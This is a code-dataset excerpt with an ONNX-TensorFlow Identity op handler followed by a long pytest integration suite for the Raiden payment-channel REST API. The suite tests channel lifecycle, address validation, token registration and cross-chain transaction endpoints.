ZemingZhao/onnx-tensorflow
0
16724
<filename>onnx_tf/handlers/backend/identity.py import tensorflow as tf from onnx_tf.handlers.backend_handler import BackendHandler from onnx_tf.handlers.handler import onnx_op from onnx_tf.handlers.handler import tf_func @onnx_op("Identity") @tf_func(tf.identity) class Identity(BackendHandler): @classmethod def version_1(cls, node, **kwargs): return [cls.make_tensor_from_onnx_node(node, **kwargs)] @classmethod def version_13(cls, node, **kwargs): return [cls.make_tensor_from_onnx_node(node, **kwargs)] @classmethod def version_14(cls, node, **kwargs): x = kwargs["tensor_dict"][node.inputs[0]] if isinstance(x, (list, tuple)): return [tf.identity_n(x)] else: return [tf.identity(x)]
2.109375
2
raiden/tests/integration/api/test_restapi.py
litexnetwork/raiden
1
16725
from http import HTTPStatus import time import logging import pytest import grequests from flask import url_for from eth_utils import ( to_checksum_address, to_canonical_address, is_checksum_address, ) from raiden_contracts.constants import ( CONTRACT_HUMAN_STANDARD_TOKEN, MAX_TOKENS_DEPLOY, TEST_SETTLE_TIMEOUT_MIN, TEST_SETTLE_TIMEOUT_MAX, ) from raiden.api.v1.encoding import ( AddressField, HexAddressConverter, ) from raiden.transfer.state import ( CHANNEL_STATE_OPENED, CHANNEL_STATE_CLOSED, ) from raiden.tests.utils import assert_dicts_are_equal from raiden.tests.utils.client import burn_all_eth from raiden.tests.utils.smartcontracts import deploy_contract_web3 # pylint: disable=too-many-locals,unused-argument,too-many-lines def assert_no_content_response(response): assert( response is not None and response.text == '' and response.status_code == HTTPStatus.NO_CONTENT ) def assert_response_with_code(response, status_code): assert ( response is not None and response.status_code == status_code ) def assert_response_with_error(response, status_code): assert ( response is not None and response.status_code == status_code and 'errors' in response.json() and response.json()['errors'] != '' ) def assert_proper_response(response, status_code=HTTPStatus.OK): assert ( response is not None and response.status_code == status_code and response.headers['Content-Type'] == 'application/json' ) def api_url_for(api_backend, endpoint, **kwargs): api_server, _ = api_backend # url_for() expects binary address so we have to convert here for key, val in kwargs.items(): if isinstance(val, str) and val.startswith('0x'): pass #kwargs[key] = to_canonical_address(val) with api_server.flask_app.app_context(): return url_for('v1_resources.{}'.format(endpoint), **kwargs) def test_hex_converter(): converter = HexAddressConverter(map=None) # invalid hex data with pytest.raises(Exception): converter.to_python('-') # invalid address, too short with pytest.raises(Exception): 
converter.to_python('0x1234') # missing prefix 0x with pytest.raises(Exception): converter.to_python('414d72a6f6e28f4950117696081450d63d56c354') address = b'AMr\xa6\xf6\xe2\x8fIP\x11v\x96\x08\x14P\xd6=V\xc3T' assert converter.to_python('0x414D72a6f6E28F4950117696081450d63D56C354') == address def test_address_field(): # pylint: disable=protected-access field = AddressField() attr = 'test' data = object() # invalid hex data with pytest.raises(Exception): field._deserialize('-', attr, data) # invalid address, too short with pytest.raises(Exception): field._deserialize('0x1234', attr, data) # missing prefix 0x with pytest.raises(Exception): field._deserialize('414d72a6f6e28f4950117696081450d63d56c354', attr, data) address = b'AMr\xa6\xf6\xe2\x8fIP\x11v\x96\x08\x14P\xd6=V\xc3T' assert field._deserialize('0x414D72a6f6E28F4950117696081450d63D56C354', attr, data) == address def test_url_with_invalid_address(rest_api_port_number, api_backend): """ Addresses require the leading 0x in the urls. """ url_without_prefix = ( 'http://localhost:{port}/api/1/' 'channels/ea674fdde714fd979de3edf0f56aa9716b898ec8' ).format(port=rest_api_port_number) request = grequests.patch( url_without_prefix, json=dict(state='CHANNEL_STATE_SETTLED'), ) response = request.send().response assert_response_with_code(response, HTTPStatus.NOT_FOUND) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_without_prefix(api_backend): """ Addresses require leading 0x in the payload. 
""" invalid_address = '61c808d82a3ac53231750dadc13c777b59310bd9' channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 10, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_invalid_chars(api_backend): """ Addresses cannot have invalid characters in it. """ invalid_address = '0x61c808d82a3ac53231750dadc13c777b59310bdg' # g at the end is invalid channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 10, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_invalid_length(api_backend): """ Encoded addresses must have the right length. """ invalid_address = '0x61c808d82a3ac53231750dadc13c777b59310b' # g at the end is invalid channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 10, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_payload_with_address_not_eip55(api_backend): """ Provided addresses must be EIP55 encoded. 
""" invalid_address = '0xf696209d2ca35e6c88e5b99b7cda3abf316bed69' channel_data_obj = { 'partner_address': invalid_address, 'token_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'settle_timeout': 90, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_query_our_address(api_backend): request = grequests.get( api_url_for(api_backend, 'addressresource'), ) response = request.send().response assert_proper_response(response) api_server, _ = api_backend our_address = api_server.rest_api.raiden_api.address assert response.json() == {'our_address': to_checksum_address(our_address)} @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_get_channel_list( api_backend, token_addresses, reveal_timeout, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' request = grequests.get( api_url_for( api_backend, 'channelsresource', ), ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) assert response.json() == [] # let's create a new channel token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'channelsresource', ), ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) channel_info = response.json()[0] assert channel_info['partner_address'] == partner_address assert 
channel_info['token_address'] == to_checksum_address(token_address) assert 'token_network_identifier' in channel_info @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_channel_status_channel_nonexistant( api_backend, token_addresses, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] request = grequests.get( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), ) response = request.send().response assert_proper_response(response, HTTPStatus.NOT_FOUND) assert response.json()['errors'] == ( "Channel with partner '{}' for token '{}' could not be found.".format( to_checksum_address(partner_address), to_checksum_address(token_address), ) ) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_open_and_deposit_channel( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel first_partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = 0 expected_response['state'] = CHANNEL_STATE_OPENED expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) token_network_identifier = response['token_network_identifier'] # now let's open a 
channel and make a deposit too second_partner_address = '0x29FA6cf0Cce24582a9B20DB94Be4B6E017896038' balance = 100 channel_data_obj = { 'partner_address': second_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': balance, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance expected_response['state'] = CHANNEL_STATE_OPENED expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = token_network_identifier assert_dicts_are_equal(response, expected_response) # let's deposit on the first channel request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=first_partner_address, ), json={'total_deposit': balance}, ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = { 'channel_identifier': assert_dicts_are_equal.IGNORE_VALUE, 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'state': CHANNEL_STATE_OPENED, 'balance': balance, 'token_network_identifier': token_network_identifier, } assert_dicts_are_equal(response, expected_response) # let's try querying for the second channel request = grequests.get( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=second_partner_address, ), ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = { 'channel_identifier': assert_dicts_are_equal.IGNORE_VALUE, 
'partner_address': second_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'state': CHANNEL_STATE_OPENED, 'balance': balance, 'token_network_identifier': token_network_identifier, } assert_dicts_are_equal(response, expected_response) # finally let's burn all eth and try to open another channel api_server, _ = api_backend burn_all_eth(api_server.rest_api.raiden_api.raiden) channel_data_obj = { 'partner_address': '0xf3AF96F89b3d7CdcBE0C083690A28185Feb0b3CE', 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': 1, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.PAYMENT_REQUIRED) response = response.json() assert 'Insufficient ETH' in response['errors'] @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_open_close_and_settle_channel( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response balance = 0 assert_proper_response(response, status_code=HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance expected_response['state'] = CHANNEL_STATE_OPENED expected_response['reveal_timeout'] = reveal_timeout expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = 
assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) token_network_identifier = response['token_network_identifier'] # let's close the channel request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json={'state': CHANNEL_STATE_CLOSED}, ) response = request.send().response assert_proper_response(response) expected_response = { 'token_network_identifier': token_network_identifier, 'channel_identifier': assert_dicts_are_equal.IGNORE_VALUE, 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'state': CHANNEL_STATE_CLOSED, 'balance': balance, } assert_dicts_are_equal(response.json(), expected_response) def test_api_close_insufficient_eth( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response balance = 0 assert_proper_response(response, status_code=HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance expected_response['state'] = CHANNEL_STATE_OPENED expected_response['reveal_timeout'] = reveal_timeout expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) # let's burn all eth and try to close the channel api_server, _ = api_backend burn_all_eth(api_server.rest_api.raiden_api.raiden) 
request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json={'state': CHANNEL_STATE_CLOSED}, ) response = request.send().response assert_proper_response(response, HTTPStatus.PAYMENT_REQUIRED) response = response.json() assert 'Insufficient ETH' in response['errors'] @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_open_channel_invalid_input( api_backend, token_addresses, reveal_timeout, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = TEST_SETTLE_TIMEOUT_MIN - 1 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, status_code=HTTPStatus.CONFLICT) channel_data_obj['settle_timeout'] = TEST_SETTLE_TIMEOUT_MAX + 1 request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_response_with_error(response, status_code=HTTPStatus.CONFLICT) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_api_channel_state_change_errors( api_backend, token_addresses, reveal_timeout, ): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response 
assert_proper_response(response, HTTPStatus.CREATED) # let's try to set a random state request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(state='inlimbo'), ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) # let's try to set both new state and balance request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(state=CHANNEL_STATE_CLOSED, total_deposit=200), ) response = request.send().response assert_response_with_error(response, HTTPStatus.CONFLICT) # let's try to patch with no arguments request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), ) response = request.send().response assert_response_with_error(response, HTTPStatus.BAD_REQUEST) # ok now let's close and settle for real request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(state=CHANNEL_STATE_CLOSED), ) response = request.send().response assert_proper_response(response) # let's try to deposit to a settled channel request = grequests.patch( api_url_for( api_backend, 'channelsresourcebytokenandpartneraddress', token_address=token_address, partner_address=partner_address, ), json=dict(total_deposit=500), ) response = request.send().response assert_response_with_error(response, HTTPStatus.CONFLICT) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('number_of_tokens', [2]) def test_api_tokens(api_backend, blockchain_services, token_addresses): partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address1 = token_addresses[0] 
token_address2 = token_addresses[1] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address1), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address2), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) # and now let's get the token list request = grequests.get( api_url_for( api_backend, 'tokensresource', ), ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = [ to_checksum_address(token_address1), to_checksum_address(token_address2), ] assert set(response) == set(expected_response) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_query_partners_by_token(api_backend, blockchain_services, token_addresses): first_partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' second_partner_address = '0x29FA6cf0Cce24582a9B20DB94Be4B6E017896038' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() channel_data_obj['partner_address'] = second_partner_address request = grequests.put( 
api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() # and a channel for another token channel_data_obj['partner_address'] = '0xb07937AbA15304FBBB0Bf6454a9377a76E3dD39E' channel_data_obj['token_address'] = to_checksum_address(token_address) request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) # and now let's query our partners per token for the first token request = grequests.get( api_url_for( api_backend, 'partnersresourcebytokenaddress', token_address=to_checksum_address(token_address), ), ) response = request.send().response assert_proper_response(response) response = response.json() expected_response = [ { 'partner_address': first_partner_address, 'channel': '/api/1/channels/{}/{}'.format( to_checksum_address(token_address), to_checksum_address(first_partner_address), ), }, { 'partner_address': second_partner_address, 'channel': '/api/1/channels/{}/{}'.format( to_checksum_address(token_address), to_checksum_address(second_partner_address), ), }, ] assert all(r in response for r in expected_response) @pytest.mark.parametrize('number_of_nodes', [2]) def test_api_transfers(api_backend, raiden_network, token_addresses): _, app1 = raiden_network amount = 200 identifier = 42 token_address = token_addresses[0] target_address = app1.raiden.address api_server, _ = api_backend our_address = api_server.rest_api.raiden_api.address transfer = { 'initiator_address': to_checksum_address(our_address), 'target_address': to_checksum_address(target_address), 'token_address': to_checksum_address(token_address), 'amount': amount, 'identifier': identifier, } request = grequests.post( api_url_for( api_backend, 'transfertotargetresource', token_address=to_checksum_address(token_address), 
target_address=to_checksum_address(target_address), ), json={'amount': amount, 'identifier': identifier}, ) response = request.send().response assert_proper_response(response) response = response.json() assert response == transfer #demo @pytest.mark.parametrize('number_of_nodes', [2]) def test_api_crosstransactiontry(api_backend, raiden_network, token_addresses): _, app1 = raiden_network raiden = _.raiden sendETH_amount = 101 sendBTC_amount =2 receiveBTC_address = "1JnC15WwDVcC3QbQRUY6ChqRLucLpTGaJN" token_address = token_addresses[0] target_address = app1.raiden.address api_server, _ = api_backend our_address = api_server.rest_api.raiden_api.address crosstransaction = { 'initiator_address': to_checksum_address(our_address), 'target_address': to_checksum_address(target_address), 'token_address': to_checksum_address(token_address), 'sendETH_amount': sendETH_amount, 'sendBTC_amount': sendBTC_amount, 'receiveBTC_address':receiveBTC_address, } request = grequests.post( api_url_for( api_backend, 'crosstransactiontry', token_address=to_checksum_address(token_address), target_address=to_checksum_address(target_address), ), json={'initiator_address': to_checksum_address(our_address), 'sendETH_amount': sendETH_amount,'sendBTC_amount':sendBTC_amount,'receiveBTC_address':receiveBTC_address}, ) response = request.send().response time.sleep(10) hash_r = raiden.wal.storage.get_all_crosstransaction()[0][9] test_api_crosstransation_hash(api_backend,raiden_network,token_address,hash_r) assert_proper_response(response) response = response.json() assert response == crosstransaction #demo @pytest.mark.parametrize('number_of_nodes', [2]) def test_api_getcrosstransation(api_backend, raiden_network, token_addresses): _, app1 = raiden_network api_server, _ = api_backend raiden = app1.raiden test_api_crosstransactiontry(api_backend,raiden_network,token_addresses) request = grequests.get( api_url_for( api_backend, 'getcrosstransaction', ) ) response = request.send().response 
assert_proper_response(response, HTTPStatus.OK) logging.debug(response) assert response.json() != [] #test getcrosstransation_by_id cross_id = response.json()[0]['crossid'] test_api_getcrosstransation_by_id(api_backend,raiden_network,token_addresses,cross_id) def test_api_getcrosstransation_by_id(api_backend, raiden_network, token_addresses,cross_id): _, app1 = raiden_network api_server, _ = api_backend cross_id = cross_id request = grequests.get( api_url_for( api_backend, 'getcrosstransactionbyid', cross_id = cross_id, ) ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) assert response.json() != [] def test_api_crosstransation_hash(api_backend, raiden_network, token_addresses,hash_r): _, app1 = raiden_network api_server, _ = api_backend hash_r = str(hash_r) request = grequests.get( api_url_for( api_backend, 'recivehashresource', hash_r = hash_r, ) ) response = request.send().response assert_proper_response(response, HTTPStatus.OK) assert response.json() == 'hash_r is ok' @pytest.mark.parametrize('number_of_tokens', [0]) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_register_token(api_backend, token_amount, token_addresses, raiden_network): app0 = raiden_network[0] new_token_address = deploy_contract_web3( CONTRACT_HUMAN_STANDARD_TOKEN, app0.raiden.chain.client, num_confirmations=None, constructor_arguments=( token_amount, 2, 'raiden', 'Rd', ), ) other_token_address = deploy_contract_web3( CONTRACT_HUMAN_STANDARD_TOKEN, app0.raiden.chain.client, num_confirmations=None, constructor_arguments=( token_amount, 2, 'raiden', 'Rd', ), ) register_request = grequests.put(api_url_for( api_backend, 'registertokenresource', token_address=to_checksum_address(new_token_address), )) register_response = register_request.send().response assert_proper_response(register_response, status_code=HTTPStatus.CREATED) response_json = register_response.json() assert 'token_network_address' in 
response_json assert is_checksum_address(response_json['token_network_address']) # now try to reregister it and get the error conflict_request = grequests.put(api_url_for( api_backend, 'registertokenresource', token_address=to_checksum_address(new_token_address), )) conflict_response = conflict_request.send().response assert_response_with_error(conflict_response, HTTPStatus.CONFLICT) # Burn all the eth and then make sure we get the appropriate API error burn_all_eth(app0.raiden) poor_request = grequests.put(api_url_for( api_backend, 'registertokenresource', token_address=to_checksum_address(other_token_address), )) poor_response = poor_request.send().response assert_response_with_error(poor_response, HTTPStatus.PAYMENT_REQUIRED) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('number_of_tokens', [2]) def test_get_connection_managers_info(api_backend, token_addresses): # check that there are no registered tokens request = grequests.get( api_url_for(api_backend, 'connectionsinforesource'), ) response = request.send().response result = response.json() assert len(result) == 0 funds = 100 token_address1 = to_checksum_address(token_addresses[0]) connect_data_obj = { 'funds': funds, } request = grequests.put( api_url_for( api_backend, 'connectionsresource', token_address=token_address1, ), json=connect_data_obj, ) response = request.send().response assert_no_content_response(response) # check that there now is one registered channel manager request = grequests.get( api_url_for(api_backend, 'connectionsinforesource'), ) response = request.send().response result = response.json() assert isinstance(result, dict) and len(result.keys()) == 1 assert token_address1 in result assert isinstance(result[token_address1], dict) assert set(result[token_address1].keys()) == {'funds', 'sum_deposits', 'channels'} funds = 100 token_address2 = to_checksum_address(token_addresses[1]) connect_data_obj = { 'funds': 
funds, } request = grequests.put( api_url_for( api_backend, 'connectionsresource', token_address=token_address2, ), json=connect_data_obj, ) response = request.send().response assert_no_content_response(response) # check that there now are two registered channel managers request = grequests.get( api_url_for(api_backend, 'connectionsinforesource'), ) response = request.send().response result = response.json() assert isinstance(result, dict) and len(result.keys()) == 2 assert token_address2 in result assert isinstance(result[token_address2], dict) assert set(result[token_address2].keys()) == {'funds', 'sum_deposits', 'channels'} @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('number_of_tokens', [2]) def test_connect_insufficient_eth(api_backend, token_addresses): # Burn all eth and then try to connect to a token network api_server, _ = api_backend burn_all_eth(api_server.rest_api.raiden_api.raiden) funds = 100 token_address1 = to_checksum_address(token_addresses[0]) connect_data_obj = { 'funds': funds, } request = grequests.put( api_url_for( api_backend, 'connectionsresource', token_address=token_address1, ), json=connect_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.PAYMENT_REQUIRED) response = response.json() assert 'Insufficient ETH' in response['errors'] @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_network_events(api_backend, token_addresses): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response 
assert_proper_response(response, status_code=HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'networkeventsresource', from_block=0, ), ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.OK) assert len(response.json()) > 0 @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_token_events(api_backend, token_addresses): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'tokeneventsresource', token_address=token_address, from_block=0, ), ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.OK) assert len(response.json()) > 0 @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_channel_events(api_backend, token_addresses): # let's create a new channel partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 channel_data_obj = { 'partner_address': partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, status_code=HTTPStatus.CREATED) request = grequests.get( api_url_for( api_backend, 'channeleventsresource', partner_address=partner_address, token_address=token_address, from_block=0, ), ) response = 
request.send().response assert_proper_response(response, status_code=HTTPStatus.OK) assert len(response.json()) > 0 @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) def test_token_events_errors_for_unregistered_token(api_backend): request = grequests.get( api_url_for( api_backend, 'tokeneventsresource', token_address='<KEY>', from_block=5, to_block=20, ), ) response = request.send().response assert_response_with_error(response, status_code=HTTPStatus.NOT_FOUND) @pytest.mark.parametrize('number_of_nodes', [1]) @pytest.mark.parametrize('channels_per_node', [0]) @pytest.mark.parametrize('deposit', [50000]) def test_api_deposit_limit( api_backend, token_addresses, reveal_timeout, ): # let's create a new channel and deposit exactly the limit amount first_partner_address = '0x61C808D82A3Ac53231750daDc13c777b59310bD9' token_address = token_addresses[0] settle_timeout = 1650 balance_working = MAX_TOKENS_DEPLOY * (10 ** 2) # token has two digits channel_data_obj = { 'partner_address': first_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': balance_working, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CREATED) response = response.json() expected_response = channel_data_obj expected_response['balance'] = balance_working expected_response['state'] = CHANNEL_STATE_OPENED expected_response['channel_identifier'] = assert_dicts_are_equal.IGNORE_VALUE expected_response['token_network_identifier'] = assert_dicts_are_equal.IGNORE_VALUE assert_dicts_are_equal(response, expected_response) # now let's open a channel and deposit a bit more than the limit second_partner_address = '0x29FA6cf0Cce24582a9B20DB94Be4B6E017896038' balance_failing = balance_working + 1 # token has two digits channel_data_obj = { 
'partner_address': second_partner_address, 'token_address': to_checksum_address(token_address), 'settle_timeout': settle_timeout, 'reveal_timeout': reveal_timeout, 'balance': balance_failing, } request = grequests.put( api_url_for( api_backend, 'channelsresource', ), json=channel_data_obj, ) response = request.send().response assert_proper_response(response, HTTPStatus.CONFLICT) response = response.json() assert response['errors'] == 'The deposit of 10001 is bigger than the current limit of 10000'
2.0625
2
contents/MyExperiment/Exp3_test/cluster_env.py
Feng-XiaoYue/Reinforcement-learning-with-tensorflow-master
0
16726
